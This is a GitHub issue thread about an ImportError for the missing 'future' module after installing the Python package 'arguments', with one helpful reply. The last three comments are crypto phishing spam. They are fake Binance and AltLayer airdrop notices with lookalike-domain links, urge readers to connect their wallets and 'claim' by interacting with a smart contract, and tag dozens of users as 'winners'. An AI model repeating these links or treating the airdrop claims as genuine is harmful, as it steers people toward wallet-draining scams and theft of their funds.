### ISSUE TITLE
ImportError in venv

### ISSUE THREAD

**Issue by SzieberthAdam** [erikdejonge/arguments#1]
Hi!

I was getting into the following exception: 

```
$ pip install arguments
Collecting arguments
  Downloading arguments-53.tar.gz
Installing collected packages: arguments
  Running setup.py install for arguments
Successfully installed arguments-53
$ python
Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import arguments
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "e:\oe2010mock\lib\site-packages\arguments\__init__.py", line 12, in <module>
    from future import standard_library
ImportError: No module named 'future'
```

**Comment by GuillaumeSmaha** [comment]
`pip installl future` solves the issue

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @caoandong, @moha403, @todd-tao, @DachuanZhao, @westaiden, @dopecodez, @823688826, @sipani909, @jordanatkins, @AlexKMDev, @NithishCodez, @skrtt777, @aryatyp, @rchasman, @digicannon, @plempereur, @ojra89, @R3dFruitRollUp, @hammadmobin, @ygnoh, @progress-solo, @Kaizhi, @SudhanPlayz, @ribeirojr, @herasj, @tokky01, @coingather, @hatboyzero, @kamaljeet, @HotKurry, @oleksandr-balyshyn, @iwatakeshi, @mrlaz0s, @nim973, @JdaDong, @wilmoore, @DolorHunter, @ianrtracey, @legendofmiracles, @MurphyAdam, @deogw, @BlackSwanBay, @istiak101, @jarivers082461, @Codingprodigy-tech, @phillip2084, @rimland, @evemorgen, @fmind, @xbucd

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @iamskok, @andrewyang17, @shyamjais, @pelima, @SYAO002, @akhercha, @maxclchen

**Comment by 1250285** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @ripstick, @MCT5, @Alinghbtc, @richardsb1103, @24, @cicaglisa80, @stagfoo, @dapao9999, @Havenstd06, @vikinsa, @tigwyk, @hhstore, @cblh, @0xhanh, @markub3327, @longht021189, @bennyteowh, @zhoujz10, @Delphine-Jean, @izaac
